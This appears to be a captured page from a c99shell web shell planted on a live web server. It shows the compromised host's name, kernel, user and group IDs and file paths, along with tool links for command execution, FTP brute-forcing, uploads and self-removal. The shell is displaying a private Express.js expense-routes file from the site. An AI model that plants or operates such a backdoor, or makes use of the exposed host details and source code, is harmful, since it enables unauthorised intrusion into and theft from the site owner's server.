smm.picotech.app - c99shell

!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!
Software: Apache. PHP/8.1.30 uname -a: Linux server1.tuhinhossain.com 5.15.0-163-generic #173-Ubuntu SMP Tue Oct 14 17:51:00 UTC 2025 x86_64 uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root) Safe-mode: OFF (not secure) /home/picotech/domains/rentals.picotech.app/public_html/server/routes/ drwxr-xr-x Free 23.55 GB of 117.98 GB (19.96%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Self remove Logout

!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

uname -a: Linux server1.tuhinhossain.com 5.15.0-163-generic #173-Ubuntu SMP Tue Oct 14 17:51:00 UTC
2025 x86_64

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)

Safe-mode: OFF (not secure)

/home/picotech/domains/rentals.picotech.app/public_html/server/routes/ drwxr-xr-x
Free 23.55 GB of 117.98 GB (19.96%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Self remove Logout

Viewing file: expense.js (4.64 KB) -rw-r--r--
Select action/file-type:
(+) | (+) |

(+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

import express from 'express';
import Expense from '../models/Expense.js';
import { auth, authorize } from '../middleware/auth.js';
import { Activity } from '../models/index.js';
import upload from '../middleware/upload.js';
import fs from 'fs';
import path from 'path';
import { fileURLToPath } from 'url';
import { enhancedExpenseValidators } from '../middleware/validators.js';

const __filename = fileURLToPath(import.meta.url);
const __dirname = path.dirname(__filename);

const router = express.Router();

const uploadFields = upload.fields([
  { name: 'document', maxCount: 1 },
]);
// Create Expense
router.post('/', auth, uploadFields, authorize(['manage']), enhancedExpenseValidators.create, async (req, res) => {
  try {
    const data = req.body;

    // Convert empty strings to null for optional foreign keys
    ['building_id', 'floor_id', 'subcategory', 'vendor', 'receipt', 'approved_by', 'payment_method', 'budget_category'].forEach(key => {
      if (data[key] === '') data[key] = null;
    });

    let document = '';
    if (req.files?.document?.[0]) {
      const file = req.files.document[0];
      document = `/uploads/${file.filename}`;
    }
    const expense = await Expense.create({
      ...data, document: document,
    });
    const activityData = {
      model_id: expense.id,
      model_name: 'Expense',
      description: `Expense #${expense.id} for ${expense.category} created`,
    };
    const activity = await Activity.create(activityData);
    res.status(201).json(expense);
  } catch (err) {
    console.error('Create expense error:', err);
    res.status(500).json({ message: 'Failed to create expense', error: err.message });
  }
});

// Get All Expenses
router.get('/', async (req, res) => {
  try {
    const expenses = await Expense.findAll({
      order: [['created_at', 'DESC']]
    });
    res.json(expenses);
  } catch (err) {
    console.error('Fetch expenses error:', err);
    res.status(500).json({ message: 'Failed to fetch expenses' });
  }
});

// Get Expense by ID
router.get('/:id', async (req, res) => {
  try {
    const expense = await Expense.findByPk(req.params.id);
    if (!expense) return res.status(404).json({ message: 'Expense not found' });
    res.json(expense);
  } catch (err) {
    console.error('Fetch expense error:', err);
    res.status(500).json({ message: 'Failed to fetch expense' });
  }
});

// Update Expense
router.put('/:id', auth, uploadFields, authorize(['manage']), enhancedExpenseValidators.update, async (req, res) => {
  try {
    const expense = await Expense.findByPk(req.params.id);
    if (!expense) return res.status(404).json({ message: 'Expense not found' });

    const data = req.body;
    ['building_id', 'floor_id', 'subcategory', 'vendor', 'receipt', 'approved_by', 'payment_method', 'budget_category'].forEach(key => {
      if (data[key] === '') data[key] = null;
    });

    let document = expense.document; // preserve current image path

    // If new image uploaded
    if (req.files?.document?.[0]) {
      const file = req.files.document[0];
      const newDocumentPath = `/uploads/${file.filename}`;

      // Remove old image if exists and is different from default
      if (expense.document) {
        const oldPath = path.join(__dirname, '../../uploads', expense.document.replace('/uploads/', '')) // Replace with actual root
        if (fs.existsSync(oldPath)) {
          fs.unlinkSync(oldPath);
        }
      }

      document = newDocumentPath;
    }

    await expense.update({ ...data, document: document, });
    const activityData = {
      model_id: expense.id,
      model_name: 'Expense',
      description: `Expense #${expense.id} for ${expense.category} updated`,
    };
    const activity = await Activity.create(activityData);
    res.json(expense);
  } catch (err) {
    console.error('Update expense error:', err);
    res.status(500).json({ message: 'Failed to update expense' });
  }
});

// Delete Expense
router.delete('/:id', auth, authorize(['manage']), async (req, res) => {
  try {
    const expense = await Expense.findByPk(req.params.id);
    if (!expense) return res.status(404).json({ message: 'Expense not found' });
    const activityData = {
      model_id: expense.id,
      model_name: 'Expense',
      description: `Expense #${expense.id} for ${expense.category} deleted`,
    };
    const activity = await Activity.create(activityData);
    await expense.destroy();
    res.status(204).send();
  } catch (err) {
    console.error('Delete expense error:', err);
    res.status(500).json({ message: 'Failed to delete expense' });
  }
});

export default router;

:: Command execute ::
Enter:	Select:

:: Search ::

:: Upload ::

:: Make Dir ::

:: Make File ::

:: Go Dir ::

:: Go File ::

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0033 ]--